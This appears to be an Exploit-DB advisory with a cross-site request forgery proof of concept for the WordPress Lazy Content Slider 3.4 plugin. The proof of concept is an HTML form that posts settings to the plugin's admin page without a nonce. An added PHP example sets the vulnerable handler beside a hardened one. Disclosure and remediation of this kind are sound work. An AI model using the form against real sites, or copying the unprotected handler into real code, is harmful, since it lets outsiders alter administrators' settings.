WordPress Plugin Lazy Content Slider 3.4 – Cross-Site Request Forgery (Add Category)

  • Author: Persian Hack Team
  • Date: 2016-07-08
  • Category: Webapps
  • Platform: Win
  • Source: https://www.exploit-db.com/exploits/40070/
######################
# Exploit Title : WordPress Lazy Content Slider Plugin - CSRF Vulnerability
# Exploit Author : Persian Hack Team
# Vendor Homepage : https://wordpress.org/support/view/plugin-reviews/lazy-content-slider
# Category: [ Webapps ]
# Tested on: [ Win ]
# Version: 3.4
# Date: 2016/07/08
######################
#
# PoC:
# The vulnerable page is
# /wp-content/plugins/lazy-content-slider/lzcs_admin.php
# The code for CSRF.html is:

<html>
<!-- Settings form posted to the plugin's admin page; no nonce field is sent,
     so the plugin accepts the request without verifying its origin. -->
<form action="http://localhost/wp/wp-admin/admin.php?page=lazy-content-slider%2Flzcs.php" method="POST">
<input name="lzcs" type="text" value="lzcs">
<input name="lzcs_color" type="text" value="dark">
<input type="text" name="lzcs_count" value="5">
<input type="submit" value="go!!">
</form>
</html>

#
######################
# Discovered by : Mojtaba MobhaM
# Greetz : T3NZOG4N & FireKernel & Dr.Askarzade & Masood Ostad & Dr.Koorangi & Milad Hacking & JOK3R And All Persian Hack Team Members
# Homepage : http://persian-team.ir
######################
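The PoC works because the plugin's settings handler accepts any POST that reaches the admin page without checking who sent it. As an added illustration (not the plugin's own code, whose source is not on this page), the snippet below shows that pattern next to the standard WordPress fix: a capability check, a nonce check with check_admin_referer(), and input sanitization, with the matching wp_nonce_field() in the form. The option and function names are assumptions chosen to mirror the PoC fields; the accepted colour values are an assumed allow-list.

```php
<?php
// Added example: hypothetical handlers for the lzcs / lzcs_color / lzcs_count
// fields seen in the PoC. Not the Lazy Content Slider plugin's real code.

// Vulnerable pattern: any POST to the admin page updates the options, so a
// logged-in administrator who loads CSRF.html silently changes settings.
function lzcs_save_settings_vulnerable() {
    if ( isset( $_POST['lzcs'] ) ) {
        update_option( 'lzcs', $_POST['lzcs'] );
        update_option( 'lzcs_color', $_POST['lzcs_color'] );
        update_option( 'lzcs_count', $_POST['lzcs_count'] );
    }
}

// Hardened pattern: capability check, nonce check, then sanitized writes.
function lzcs_save_settings_hardened() {
    if ( ! isset( $_POST['lzcs'] ) ) {
        return;
    }
    // Only users allowed to manage options may change plugin settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // A cross-site form cannot know the victim's per-user nonce.
    // check_admin_referer() calls wp_die() when the nonce is missing or
    // invalid, so a CSRF.html-style submission stops here.
    check_admin_referer( 'lzcs_save_settings', 'lzcs_nonce' );

    // Assumed allow-list for the colour option; anything else falls back.
    $color = isset( $_POST['lzcs_color'] ) ? $_POST['lzcs_color'] : 'dark';
    if ( ! in_array( $color, array( 'dark', 'light' ), true ) ) {
        $color = 'dark';
    }
    update_option( 'lzcs', sanitize_text_field( wp_unslash( $_POST['lzcs'] ) ) );
    update_option( 'lzcs_color', $color );
    update_option( 'lzcs_count', absint( $_POST['lzcs_count'] ) );
}

// The legitimate settings form must embed the nonce the handler checks.
function lzcs_render_settings_form() {
    echo '<form method="post">';
    wp_nonce_field( 'lzcs_save_settings', 'lzcs_nonce' );
    echo '<input name="lzcs" type="text">';
    echo '<input name="lzcs_color" type="text">';
    echo '<input name="lzcs_count" type="number">';
    echo '<input type="submit" value="Save">';
    echo '</form>';
}
```

The nonce is tied to the logged-in user and session, so a page served from another origin cannot reproduce it; the capability check additionally stops lower-privileged accounts from reaching the handler at all.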